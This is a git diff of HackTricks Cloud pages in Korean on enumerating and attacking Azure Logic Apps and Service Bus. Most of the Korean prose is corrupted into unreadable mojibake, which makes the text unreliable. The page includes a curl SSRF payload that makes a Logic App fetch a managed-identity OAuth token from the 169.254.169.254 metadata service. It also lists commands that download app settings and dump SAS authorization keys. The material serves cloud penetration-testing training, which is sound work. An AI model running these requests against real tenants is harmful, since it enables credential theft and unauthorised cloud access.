- **๋ฐ์ดํฐ ํ์ดํ๋ผ์ธ ์๋ํ**: Logic Apps๋ Azure Data Factory์ ๊ฒฐํฉํ์ฌ **๋ฐ์ดํฐ ์ ์ก ๋ฐ ๋ณํ ํ๋ก์ธ์ค**๋ฅผ ์๋ํํ ์ ์์ต๋๋ค. ์ด๋ Azure SQL Database์ Azure Blob Storage์ ๊ฐ์ ๋ค์ํ ๋ฐ์ดํฐ ์ ์ฅ์ ๊ฐ์ ๋ฐ์ดํฐ๋ฅผ ์ด๋ํ๊ณ ๋ณํํ๋ ํ์ฅ ๊ฐ๋ฅํ๊ณ ์ ๋ขฐํ ์ ์๋ ๋ฐ์ดํฐ ํ์ดํ๋ผ์ธ์ ์์ฑํ๋ ๋ฐ ์ ์ฉํ๋ฉฐ, ๋ถ์ ๋ฐ ๋น์ฆ๋์ค ์ธํ
๋ฆฌ์ ์ค ์์
์ ๋์์ ์ค๋๋ค.
-- **Azure Functions์ ํตํฉ**: Logic Apps๋ Azure Functions์ ํจ๊ป ์๋ํ์ฌ **ํ์์ ๋ฐ๋ผ ํ์ฅ๋๋ ์ ๊ตํ ์ด๋ฒคํธ ๊ธฐ๋ฐ ์ ํ๋ฆฌ์ผ์ด์
์ ๊ฐ๋ฐ**ํ๊ณ ๋ค๋ฅธ Azure ์๋น์ค์ ์ํํ๊ฒ ํตํฉํ ์ ์์ต๋๋ค. ์ฌ์ฉ ์ฌ๋ก์ ์๋ก๋ Logic App์ ์ฌ์ฉํ์ฌ Azure Storage ๊ณ์ ์ ๋ณ๊ฒฝ๊ณผ ๊ฐ์ ํน์ ์ด๋ฒคํธ์ ์๋ตํ์ฌ Azure Function์ ํธ๋ฆฌ๊ฑฐํ๋ ๊ฒ์ด ์์ผ๋ฉฐ, ์ด๋ฅผ ํตํด ๋์ ๋ฐ์ดํฐ ์ฒ๋ฆฌ๊ฐ ๊ฐ๋ฅํฉ๋๋ค.
+- **Azure Functions์ ํตํฉ**: Logic Apps๋ Azure Functions์ ํจ๊ป ์๋ํ์ฌ **ํ์์ ๋ฐ๋ผ ํ์ฅ๋๋ ์ ๊ตํ ์ด๋ฒคํธ ๊ธฐ๋ฐ ์ ํ๋ฆฌ์ผ์ด์
์ ๊ฐ๋ฐ**ํ๊ณ ๋ค๋ฅธ Azure ์๋น์ค์ ์ํํ๊ฒ ํตํฉํ ์ ์์ต๋๋ค. ์๋ฅผ ๋ค์ด, Logic App์ ์ฌ์ฉํ์ฌ Azure Storage ๊ณ์ ์ ๋ณ๊ฒฝ๊ณผ ๊ฐ์ ํน์ ์ด๋ฒคํธ์ ์๋ตํ์ฌ Azure Function์ ํธ๋ฆฌ๊ฑฐํ๋ ์ฌ์ฉ ์ฌ๋ก๊ฐ ์์ต๋๋ค. ์ด๋ฅผ ํตํด ๋์ ๋ฐ์ดํฐ ์ฒ๋ฆฌ๊ฐ ๊ฐ๋ฅํฉ๋๋ค.
### LogicAPP ์๊ฐํ
@@ -30,34 +30,260 @@ Logic Apps๋ **๊ด๋ฒ์ํ ์ฌ์ ๊ตฌ์ถ๋ ์ปค๋ฅํฐ**๋ฅผ ์ฌ์ฉํ์ฌ ์ํฌ
# The URL belongs to a Logic App vulenrable to SSRF
curl -XPOST 'https://prod-44.westus.logic.azure.com:443/workflows/2d8de4be6e974123adf0b98159966644/triggers/manual/paths/invoke?api-version=2016-10-01&sp=%2Ftriggers%2Fmanual%2Frun&sv=1.0&sig=_8_oqqsCXc0u2c7hNjtSZmT0uM4Xi3hktw6Uze0O34s' -d '{"url": "http://169.254.169.254/metadata/identity/oauth2/token?api-version=2018-02-01&resource=https://management.azure.com/"}' -H "Content-type: application/json" -v
```
-### Enumeration
+### ํธ์คํ
์ต์
-{{#tabs }}
-{{#tab name="az cli" }}
+์ฌ๋ฌ ํธ์คํ
์ต์
์ด ์์ต๋๋ค:
+
+* **์๋นํ**
+- **๋ค์ค ํ
๋ํธ**: ๊ณต์ ์ปดํจํ
๋ฆฌ์์ค๋ฅผ ์ ๊ณตํ๋ฉฐ, ํผ๋ธ๋ฆญ ํด๋ผ์ฐ๋์์ ์ด์๋๊ณ , ์์
๋น ์๊ธ ๋ชจ๋ธ์ ๋ฐ๋ฆ
๋๋ค. ์ด๋ ๊ฒฝ๋ ๋ฐ ๋น์ฉ ํจ์จ์ ์ธ ์์
์ ์ด์์ ์
๋๋ค.
+* **ํ์ค**
+- **์ํฌํ๋ก์ฐ ์๋น์ค ๊ณํ**: ๋คํธ์ํน์ ์ํ VNET ํตํฉ์ด ์๋ ์ ์ฉ ์ปดํจํ
๋ฆฌ์์ค์ ์ํฌํ๋ก์ฐ ์๋น์ค ๊ณํ ์ธ์คํด์ค๋น ์๊ธ์ ๋ถ๊ณผํฉ๋๋ค. ์ด๋ ๋ ๋ง์ ์ ์ด๊ฐ ํ์ํ ์๊ตฌ๊ฐ ๋ง์ ์์
์ ์ ํฉํฉ๋๋ค.
+- **์ฑ ์๋น์ค ํ๊ฒฝ V3**: ์์ ํ ๊ฒฉ๋ฆฌ ๋ฐ ํ์ฅ์ฑ์ ๊ฐ์ถ ์ ์ฉ ์ปดํจํ
๋ฆฌ์์ค์
๋๋ค. ๋ํ ๋คํธ์ํน์ ์ํด VNET๊ณผ ํตํฉ๋๋ฉฐ, ํ๊ฒฝ ๋ด์ ์ฑ ์๋น์ค ์ธ์คํด์ค๋ฅผ ๊ธฐ๋ฐ์ผ๋ก ํ ์๊ธ ๋ชจ๋ธ์ ์ฌ์ฉํฉ๋๋ค. ์ด๋ ๋์ ๊ฒฉ๋ฆฌ๊ฐ ํ์ํ ๊ธฐ์
๊ท๋ชจ์ ์ ํ๋ฆฌ์ผ์ด์
์ ์ด์์ ์
๋๋ค.
+- **ํ์ด๋ธ๋ฆฌ๋**: ๋ก์ปฌ ์ฒ๋ฆฌ ๋ฐ ๋ค์ค ํด๋ผ์ฐ๋ ์ง์์ ์ํด ์ค๊ณ๋์์ต๋๋ค. ๊ณ ๊ฐ ๊ด๋ฆฌํ ์ปดํจํ
๋ฆฌ์์ค๋ฅผ ๋ก์ปฌ ๋คํธ์ํฌ ์ก์ธ์ค์ ํจ๊ป ์ฌ์ฉํ ์ ์์ผ๋ฉฐ, Kubernetes ์ด๋ฒคํธ ๊ธฐ๋ฐ ์๋ ํ์ฅ(KEDA)์ ํ์ฉํฉ๋๋ค.
+
+### ์ด๊ฑฐ
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# List
-az logic workflow list --resource-group --subscription --output table
+az logic workflow list --resource-group
# Get info
-az logic workflow show --name --resource-group --subscription
-# Get Logic App config
-az logic workflow definition show --name --resource-group --subscription
-# Get service ppal used
-az logic workflow identity show --name --resource-group --subscription
-```
-{{#endtab }}
+az logic workflow show --name --resource-group
-{{#tab name="Az PowerSHell" }}
+# Get details of a specific Logic App workflow, including its connections and parameters
+az rest \
+--method GET \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}?api-version=2016-10-01&$expand=connections.json,parameters.json" \
+--headers "Content-Type=application/json"
+
+# Get details about triggers for a specific Logic App
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers?api-version=2016-06-01"
+
+# Get the callback URL for a specific trigger in a Logic App
+az rest --method POST \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/listCallbackUrl?api-version=2016-06-01"
+
+# Get the history of a specific trigger in a Logic App
+az rest --method GET \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{logicAppName}/triggers/{triggerName}/histories?api-version=2016-06-01"
+
+# List all runs of a specific Logic App workflow
+az rest \
+--method GET \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs?api-version=2016-06-01" \
+--headers "Content-Type=application/json"
+
+# Get all actions within a specific run of a Logic App workflow
+az rest \
+--method GET \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/runs/{runName}/actions?api-version=2016-06-01" \
+--headers "Content-Type=application/json"
+
+# List all versions of a specific Logic App workflow
+az rest \
+--method GET \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions?api-version=2016-06-01" \
+--headers "Content-Type=application/json"
+
+# Get details of a specific version of a Logic App workflow
+az rest \
+--method GET \
+--uri "https://management.azure.com/subscriptions/{subscriptionId}/resourceGroups/{resourceGroupName}/providers/Microsoft.Logic/workflows/{workflowName}/versions/{versionName}?api-version=2016-06-01" \
+--headers "Content-Type=application/json"
+
+az rest \
+--method GET \
+--uri "https://examplelogicapp1994.scm.azurewebsites.net/api/functions/admin/download?includeCsproj=true&includeAppSettings=true" \
+--headers "Content-Type=application/json"
+
+# List all Logic Apps in the specified resource group
+az logicapp list --resource-group
+
+# Show detailed information about a specific Logic App
+az logicapp show --name --resource-group
+
+# List all application settings for a specific Logic App
+az logicapp config appsettings list --name --resource-group
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
```bash
+Get-Command -Module Az.LogicApp
+
# List
Get-AzLogicApp -ResourceGroupName
# Get info
Get-AzLogicApp -ResourceGroupName -Name
-# Get Logic App config
-(Get-AzLogicApp -ResourceGroupName -Name ).Definition | ConvertTo-Json
-# Get service ppal used
-(Get-AzLogicApp -ResourceGroupName -Name ).Identity
-```
-{{#endtab }}
-{{#endtabs }}
-{{#include ../../../banners/hacktricks-training.md}}
+# Get details of a specific Logic App workflow run action
+Get-AzLogicAppRunAction -ResourceGroupName "" -Name "" -RunName ""
+
+# Get the run history for a specific Logic App
+Get-AzLogicAppRunHistory -ResourceGroupName "" -Name ""
+
+# Get details about triggers for a specific Logic App
+Get-AzLogicAppTrigger -ResourceGroupName "" -Name ""
+
+# Get the callback URL for a specific trigger in a Logic App
+Get-AzLogicAppTriggerCallbackUrl -ResourceGroupName "" -LName "" -TriggerName ""
+
+# Get the history of a specific trigger in a Logic App
+Get-AzLogicAppTriggerHistory -ResourceGroupName "" -Name "" -TriggerName ""
+
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+
+
+### ํตํฉ ๊ณ์
+**ํตํฉ ๊ณ์ **์ Azure Logic Apps์ ๊ธฐ๋ฅ์
๋๋ค. ํตํฉ ๊ณ์ ์ EDI, AS2 ๋ฐ XML ์คํค๋ง ๊ด๋ฆฌ์ ๊ฐ์ ๊ณ ๊ธ B2B ๊ธฐ๋ฅ์ ํ์ฑํํ์ฌ ๊ธฐ์
์์ค์ ํตํฉ์ ์ฉ์ดํ๊ฒ ํฉ๋๋ค. ํตํฉ ๊ณ์ ์ Logic Apps์ ์ฌ์ฉ๋๋ ๋ค์ ์ํฐํฉํธ๋ฅผ ์ ์ฅํ๋ Azure์ ์ปจํ
์ด๋์
๋๋ค:
+
+* ์คํค๋ง: ํตํฉ ๊ณ์ ์์ ๋ฉ์์ง๋ฅผ ๊ฒ์ฆํ๊ณ ์ฒ๋ฆฌํ๊ธฐ ์ํ XML ์คํค๋ง๋ฅผ ๊ด๋ฆฌํฉ๋๋ค.
+* ๋งต: ํตํฉ ์ํฌํ๋ก ๋ด์์ ๋ฐ์ดํฐ ํ์์ ๋ณํํ๊ธฐ ์ํด XSLT ๊ธฐ๋ฐ ๋ณํ์ ๊ตฌ์ฑํฉ๋๋ค.
+* ์ด์
๋ธ๋ฆฌ: ๋
ผ๋ฆฌ ๋ฐ ๋ฐ์ดํฐ ์ฒ๋ฆฌ๋ฅผ ๊ฐ์ํํ๊ธฐ ์ํด ํตํฉ ๊ณ์ ์ด์
๋ธ๋ฆฌ๋ฅผ ๊ด๋ฆฌํฉ๋๋ค.
+* ์ธ์ฆ์: ๋ฉ์์ง๋ฅผ ์ํธํํ๊ณ ์๋ช
ํ๊ธฐ ์ํ ์ธ์ฆ์๋ฅผ ์ฒ๋ฆฌํ์ฌ ์์ ํ ํต์ ์ ๋ณด์ฅํฉ๋๋ค.
+* ํํธ๋: B2B ๊ฑฐ๋๋ฅผ ์ํ ๊ฑฐ๋ ํํธ๋ ์ ๋ณด๋ฅผ ๊ด๋ฆฌํ์ฌ ์ํํ ํตํฉ์ ๊ฐ๋ฅํ๊ฒ ํฉ๋๋ค.
+* ๊ณ์ฝ: ๊ฑฐ๋ ํํธ๋์ ๋ฐ์ดํฐ ๊ตํ์ ์ํ ๊ท์น ๋ฐ ์ค์ ์ ๊ตฌ์ฑํฉ๋๋ค (์: EDI, AS2).
+* ๋ฐฐ์น ๊ตฌ์ฑ: ๋ฉ์์ง๋ฅผ ํจ์จ์ ์ผ๋ก ๊ทธ๋ฃนํํ๊ณ ์ฒ๋ฆฌํ๊ธฐ ์ํ ๋ฐฐ์น ์ฒ๋ฆฌ ๊ตฌ์ฑ์ ๊ด๋ฆฌํฉ๋๋ค.
+* RosettaNet PIP: B2B ํต์ ์ ํ์คํํ๊ธฐ ์ํด RosettaNet ํํธ๋ ์ธํฐํ์ด์ค ํ๋ก์ธ์ค(PIPs)๋ฅผ ๊ตฌ์ฑํฉ๋๋ค.
+
+#### ์ด๊ฑฐ
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
+```bash
+# Integration account
+az logic integration-account list --resource-group
+az logic integration-account show --resource-group --name
+az logic integration-account list-callback-url --resource-group --integration-account-name
+
+# Batch-configuration
+az logic integration-account batch-configuration list \
+--resource-group \
+--integration-account-name
+
+az logic integration-account batch-configuration show \
+--resource-group \
+--integration-account-name \
+--batch-configuration-name
+
+# Map
+az logic integration-account map list \
+--resource-group \
+--integration-account
+
+az logic integration-account map show \
+--resource-group \
+--integration-account \
+--map-name
+
+# Partner
+az logic integration-account partner list \
+--resource-group \
+--integration-account
+
+az logic integration-account partner show \
+--resource-group \
+--integration-account \
+--name
+
+# Session
+az logic integration-account session list \
+--resource-group \
+--integration-account
+
+az logic integration-account session show \
+--resource-group \
+--integration-account \
+--name
+
+# Assembly
+# Session
+az logic integration-account assembly list \
+--resource-group \
+--integration-account
+
+az logic integration-account assembly show \
+--resource-group \
+--integration-account \
+--assembly-artifact-name
+
+
+```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.LogicApp
+
+# Retrieve details of an integration account
+Get-AzIntegrationAccount -ResourceGroupName -Name
+
+# Retrieve the callback URL of an integration account
+Get-AzIntegrationAccountCallbackUrl -ResourceGroupName -IntegrationAccountName
+
+# Retrieve details of a specific agreement in an integration account
+Get-AzIntegrationAccountAgreement -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific assembly in an integration account
+Get-AzIntegrationAccountAssembly -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific batch configuration in an integration account
+Get-AzIntegrationAccountBatchConfiguration -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific certificate in an integration account
+Get-AzIntegrationAccountCertificate -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific map in an integration account
+Get-AzIntegrationAccountMap -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific partner in an integration account
+Get-AzIntegrationAccountPartner -ResourceGroupName -IntegrationAccountName -Name
+
+# Retrieve details of a specific schema in an integration account
+Get-AzIntegrationAccountSchema -ResourceGroupName -IntegrationAccountName -Name
+```
+{% endcode %}
+{% endtab %}
+{% endtabs %}
+
+
+## ๊ถํ ์์น
+
+๋ก์ง ์ฑ ๊ถํ ์์น๊ณผ ๋์ผ:
+
+{% content-ref url="../az-privilege-escalation/az-logic-apps-privesc.md" %}
+[az-logic-apps-privesc.md](../az-privilege-escalation/az-logic-apps-privesc.md)
+{% endcontent-ref %}
+
+## ํฌ์คํธ ์ต์คํ๋ก์
+
+{% content-ref url="../az-post-exploitation/az-logic-apps-post-exploitation.md" %}
+[az-logic-apps-post-exploitation.md](../az-post-exploitation/az-logic-apps-post-exploitation.md)
+{% endcontent-ref %}
+
+{% hint style="success" %}
+AWS ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)
\
+GCP ํดํน ๋ฐฐ์ฐ๊ธฐ ๋ฐ ์ฐ์ตํ๊ธฐ:
[**HackTricks Training GCP Red Team Expert (GRTE)**
](https://training.hacktricks.xyz/courses/grte)
+
+
+
+HackTricks ์ง์ํ๊ธฐ
+
+* [**๊ตฌ๋
๊ณํ**](https://github.com/sponsors/carlospolop) ํ์ธํ๊ธฐ!
+* **๐ฌ [**Discord ๊ทธ๋ฃน**](https://discord.gg/hRep4RUj7f) ๋๋ [**ํ
๋ ๊ทธ๋จ ๊ทธ๋ฃน**](https://t.me/peass)์ ์ฐธ์ฌํ๊ฑฐ๋ **Twitter** ๐ฆ [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**๋ฅผ ํ๋ก์ฐํ์ธ์.**
+* **[**HackTricks**](https://github.com/carlospolop/hacktricks) ๋ฐ [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) ๊นํ๋ธ ๋ฆฌํฌ์งํ ๋ฆฌ์ PR์ ์ ์ถํ์ฌ ํดํน ํ์ ๊ณต์ ํ์ธ์.**
+
+
+{% endhint %}
diff --git a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
index 85c3e9219..8e9efbf22 100644
--- a/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
+++ b/src/pentesting-cloud/azure-security/az-services/az-servicebus-enum.md
@@ -4,28 +4,28 @@
## Service Bus
-Azure Service Bus๋ **์ ํ๋ฆฌ์ผ์ด์
์ ๋ค์ํ ๋ถ๋ถ ๋๋ ๋ณ๋์ ์ ํ๋ฆฌ์ผ์ด์
๊ฐ์ ์ ๋ขฐํ ์ ์๋ **ํต์ ์ ๊ฐ๋ฅํ๊ฒ ํ๊ธฐ ์ํด ์ค๊ณ๋ ํด๋ผ์ฐ๋ ๊ธฐ๋ฐ **๋ฉ์์ง ์๋น์ค**์
๋๋ค. ์ด๋ ์์ ํ ์ค๊ฐ์๋ก ์์ฉํ์ฌ ๋ฐ์ ์์ ์์ ์๊ฐ ๋์์ ์๋ํ์ง ์๋๋ผ๋ ๋ฉ์์ง๊ฐ ์์ ํ๊ฒ ์ ๋ฌ๋๋๋ก ๋ณด์ฅํฉ๋๋ค. ์์คํ
์ ๋ถ๋ฆฌํจ์ผ๋ก์จ ์ ํ๋ฆฌ์ผ์ด์
์ด ๋
๋ฆฝ์ ์ผ๋ก ์๋ํ๋ฉด์๋ ๋ฐ์ดํฐ๋ ์ง์นจ์ ๊ตํํ ์ ์๊ฒ ํฉ๋๋ค. ์ด๋ ์ฌ๋ฌ ์์
์ ๊ฐ์ ๋ถํ ๋ถ์ฐ, ์ ๋ขฐํ ์ ์๋ ๋ฉ์์ง ์ ๋ฌ ๋๋ ์์๋๋ก ์์
์ ์ฒ๋ฆฌํ๊ฑฐ๋ ์์ ํ๊ฒ ์ก์ธ์ค๋ฅผ ๊ด๋ฆฌํ๋ ๊ฒ๊ณผ ๊ฐ์ ๋ณต์กํ ์กฐ์ ์ด ํ์ํ ์๋๋ฆฌ์ค์ ํนํ ์ ์ฉํฉ๋๋ค.
+Azure Service Bus๋ **์ ํ๋ฆฌ์ผ์ด์
์ ๋ค์ํ ๋ถ๋ถ ๋๋ ๋ณ๋์ ์ ํ๋ฆฌ์ผ์ด์
๊ฐ์ ์ ๋ขฐํ ์ ์๋ **ํต์ ์ ๊ฐ๋ฅํ๊ฒ ํ๊ธฐ ์ํด ์ค๊ณ๋ ํด๋ผ์ฐ๋ ๊ธฐ๋ฐ **๋ฉ์์ง ์๋น์ค**์
๋๋ค. ์ด๋ ์์ ํ ์ค๊ฐ์๋ก ์์ฉํ์ฌ ๋ฐ์ ์์ ์์ ์๊ฐ ๋์์ ์๋ํ์ง ์๋๋ผ๋ ๋ฉ์์ง๊ฐ ์์ ํ๊ฒ ์ ๋ฌ๋๋๋ก ๋ณด์ฅํฉ๋๋ค. ์์คํ
์ ๋ถ๋ฆฌํจ์ผ๋ก์จ ์ ํ๋ฆฌ์ผ์ด์
์ด ๋
๋ฆฝ์ ์ผ๋ก ์๋ํ๋ฉด์๋ ๋ฐ์ดํฐ๋ ์ง์นจ์ ๊ตํํ ์ ์๊ฒ ํฉ๋๋ค. ์ด๋ ์ฌ๋ฌ ์์
์ ๊ฐ์ ๋ถํ ๋ถ์ฐ, ์ ๋ขฐํ ์ ์๋ ๋ฉ์์ง ์ ๋ฌ ๋๋ ์์
์ ์์๋๋ก ์ฒ๋ฆฌํ๊ฑฐ๋ ์์ ํ๊ฒ ์ ๊ทผ์ ๊ด๋ฆฌํ๋ ๊ฒ๊ณผ ๊ฐ์ ๋ณต์กํ ์กฐ์ ์ด ํ์ํ ์๋๋ฆฌ์ค์ ํนํ ์ ์ฉํฉ๋๋ค.
### Key Concepts
1. **Queues:** ๊ทธ ๋ชฉ์ ์ ์์ ์๊ฐ ์ค๋น๋ ๋๊น์ง ๋ฉ์์ง๋ฅผ ์ ์ฅํ๋ ๊ฒ์
๋๋ค.
-- ๋ฉ์์ง๋ ์ ๋ ฌ๋๊ณ , ํ์์คํฌํ๊ฐ ์ฐํ๋ฉฐ, ๋ด๊ตฌ์ฑ ์๊ฒ ์ ์ฅ๋ฉ๋๋ค.
+- ๋ฉ์์ง๋ ์์๊ฐ ์์ผ๋ฉฐ, ํ์์คํฌํ๊ฐ ๋ถ๊ณ , ๋ด๊ตฌ์ฑ์ด ์๊ฒ ์ ์ฅ๋ฉ๋๋ค.
- ํ ๋ชจ๋(์์ฒญ ์ ๊ฒ์)๋ก ์ ๋ฌ๋ฉ๋๋ค.
- ํฌ์ธํธ ํฌ ํฌ์ธํธ ํต์ ์ ์ง์ํฉ๋๋ค.
2. **Topics:** ๋ฐฉ์ก์ ์ํ ๊ฒ์-๊ตฌ๋
๋ฉ์์ง์
๋๋ค.
- ์ฌ๋ฌ ๋
๋ฆฝ์ ์ธ ๊ตฌ๋
์ด ๋ฉ์์ง์ ๋ณต์ฌ๋ณธ์ ์์ ํฉ๋๋ค.
- ๊ตฌ๋
์ ์ ๋ฌ์ ์ ์ดํ๊ฑฐ๋ ๋ฉํ๋ฐ์ดํฐ๋ฅผ ์ถ๊ฐํ๊ธฐ ์ํ ๊ท์น/ํํฐ๋ฅผ ๊ฐ์ง ์ ์์ต๋๋ค.
- ๋ค๋๋ค ํต์ ์ ์ง์ํฉ๋๋ค.
-3. **Namespaces:** ๋ชจ๋ ๋ฉ์์ง ๊ตฌ์ฑ ์์, ํ ๋ฐ ์ฃผ์ ๋ฅผ ์ํ ์ปจํ
์ด๋๋ก, ๊ฐ๋ ฅํ Azure ํด๋ฌ์คํฐ์ ์์ ์ ์ฌ๋ผ์ด์ค์ ๊ฐ์ผ๋ฉฐ, ์ ์ฉ ์ฉ๋์ ์ ๊ณตํ๊ณ ์ ํ์ ์ผ๋ก ์ธ ๊ฐ์ ๊ฐ์ฉ์ฑ ์์ญ์ ๊ฑธ์ณ ํ์ฅํ ์ ์์ต๋๋ค.
+3. **Namespaces:** ๋ชจ๋ ๋ฉ์์ง ๊ตฌ์ฑ ์์, ํ ๋ฐ ์ฃผ์ ๋ฅผ ์ํ ์ปจํ
์ด๋๋ก, ๊ฐ๋ ฅํ Azure ํด๋ฌ์คํฐ์ ์์ ์ ์กฐ๊ฐ๊ณผ ๊ฐ์ผ๋ฉฐ, ์ ์ฉ ์ฉ๋์ ์ ๊ณตํ๊ณ ์ ํ์ ์ผ๋ก ์ธ ๊ฐ์ ๊ฐ์ฉ์ฑ ์์ญ์ ๊ฑธ์ณ ์์ต๋๋ค.
### Advance Features
์ผ๋ถ ๊ณ ๊ธ ๊ธฐ๋ฅ์ ๋ค์๊ณผ ๊ฐ์ต๋๋ค:
- **Message Sessions**: FIFO ์ฒ๋ฆฌ๋ฅผ ๋ณด์ฅํ๊ณ ์์ฒญ-์๋ต ํจํด์ ์ง์ํฉ๋๋ค.
-- **Auto-Forwarding**: ๋์ผํ ๋ค์์คํ์ด์ค ๋ด์์ ํ ๋๋ ์ฃผ์ ๊ฐ์ ๋ฉ์์ง๋ฅผ ์ ์กํฉ๋๋ค.
+- **Auto-Forwarding**: ๋์ผํ ๋ค์์คํ์ด์ค ๋ด์์ ํ ๋๋ ์ฃผ๊ฐ ๋ฉ์์ง๋ฅผ ์ ์กํฉ๋๋ค.
- **Dead-Lettering**: ๋ฐฐ๋ฌํ ์ ์๋ ๋ฉ์์ง๋ฅผ ๊ฒํ ๋ฅผ ์ํด ์บก์ฒํฉ๋๋ค.
-- **Scheduled Delivery**: ๋ฏธ๋์ ์์
์ ์ํด ๋ฉ์์ง ์ฒ๋ฆฌ๋ฅผ ์ง์ฐ์ํต๋๋ค.
+- **Scheduled Delivery**: ๋ฏธ๋ ์์
์ ์ํด ๋ฉ์์ง ์ฒ๋ฆฌ๋ฅผ ์ง์ฐ์ํต๋๋ค.
- **Message Deferral**: ์ค๋น๋ ๋๊น์ง ๋ฉ์์ง ๊ฒ์์ ์ฐ๊ธฐํฉ๋๋ค.
- **Transactions**: ์์
์ ์์์ ์คํ์ผ๋ก ๊ทธ๋ฃนํํฉ๋๋ค.
- **Filters & Actions**: ๋ฉ์์ง๋ฅผ ํํฐ๋งํ๊ฑฐ๋ ์ฃผ์์ ์ถ๊ฐํ๊ธฐ ์ํ ๊ท์น์ ์ ์ฉํฉ๋๋ค.
@@ -35,13 +35,13 @@ Azure Service Bus๋ **์ ํ๋ฆฌ์ผ์ด์
์ ๋ค์ํ ๋ถ๋ถ ๋๋ ๋ณ๋์
### Authorization-Rule / SAS Policy
-SAS ์ ์ฑ
์ Azure Service Bus ์ํฐํฐ ๋ค์์คํ์ด์ค(๊ฐ์ฅ ์ค์ํ ๊ฒ), ํ ๋ฐ ์ฃผ์ ์ ๋ํ ์ก์ธ์ค ๊ถํ์ ์ ์ํฉ๋๋ค. ๊ฐ ์ ์ฑ
์ ๋ค์ ๊ตฌ์ฑ ์์๋ฅผ ๊ฐ์ง๋๋ค:
+SAS ์ ์ฑ
์ Azure Service Bus ์ํฐํฐ ๋ค์์คํ์ด์ค(๊ฐ์ฅ ์ค์ํ ๊ฒ), ํ ๋ฐ ์ฃผ์ ์ ๋ํ ์ ๊ทผ ๊ถํ์ ์ ์ํฉ๋๋ค. ๊ฐ ์ ์ฑ
์ ๋ค์ ๊ตฌ์ฑ ์์๋ฅผ ๊ฐ์ง๋๋ค:
-- **Permissions**: ์ก์ธ์ค ์์ค์ ์ง์ ํ๊ธฐ ์ํ ์ฒดํฌ๋ฐ์ค:
+- **Permissions**: ์ ๊ทผ ์์ค์ ์ง์ ํ๋ ์ฒดํฌ๋ฐ์ค:
- Manage: ์ํฐํฐ์ ๋ํ ์ ์ฒด ์ ์ด๋ฅผ ๋ถ์ฌํ๋ฉฐ, ๊ตฌ์ฑ ๋ฐ ๊ถํ ๊ด๋ฆฌ๋ฅผ ํฌํจํฉ๋๋ค.
- Send: ์ํฐํฐ์ ๋ฉ์์ง๋ฅผ ์ ์กํ ์ ์์ต๋๋ค.
- Listen: ์ํฐํฐ๋ก๋ถํฐ ๋ฉ์์ง๋ฅผ ์์ ํ ์ ์์ต๋๋ค.
-- **Primary and Secondary Keys**: ์ก์ธ์ค ์ธ์ฆ์ ์ํ ๋ณด์ ํ ํฐ์ ์์ฑํ๋ ๋ฐ ์ฌ์ฉ๋๋ ์ํธํ ํค์
๋๋ค.
+- **Primary and Secondary Keys**: ์ ๊ทผ ์ธ์ฆ์ ์ํ ๋ณด์ ํ ํฐ์ ์์ฑํ๋ ๋ฐ ์ฌ์ฉ๋๋ ์ํธํ ํค์
๋๋ค.
- **Primary and Secondary Connection Strings**: ์ ํ๋ฆฌ์ผ์ด์
์์ ์ฝ๊ฒ ์ฌ์ฉํ ์ ์๋๋ก ์๋ํฌ์ธํธ์ ํค๋ฅผ ํฌํจํ ๋ฏธ๋ฆฌ ๊ตฌ์ฑ๋ ์ฐ๊ฒฐ ๋ฌธ์์ด์
๋๋ค.
- **SAS Policy ARM ID**: ํ๋ก๊ทธ๋๋ฐ์ ์๋ณ์ ์ํ ์ ์ฑ
์ Azure Resource Manager (ARM) ๊ฒฝ๋ก์
๋๋ค.
@@ -50,6 +50,10 @@ SAS ์ ์ฑ
์ Azure Service Bus ์ํฐํฐ ๋ค์์คํ์ด์ค(๊ฐ์ฅ ์ค์ํ
sku, authrorization rule,
### Enumeration
+
+{% tabs %}
+{% tab title="az cli" %}
+{% code overflow="wrap" %}
```bash
# Queue Enumeration
az servicebus queue list --resource-group --namespace-name
@@ -77,6 +81,58 @@ az servicebus queue authorization-rule list --resource-group -
az servicebus topic authorization-rule list --resource-group --namespace-name --topic-name
az servicebus namespace authorization-rule keys list --resource-group --namespace-name --name
```
+{% endcode %}
+{% endtab %}
+
+{% tab title="Az PowerShell" %}
+{% code overflow="wrap" %}
+```powershell
+Get-Command -Module Az.ServiceBus
+
+# Retrieves details of a Service Bus namespace, including V2-specific features like additional metrics or configurations.
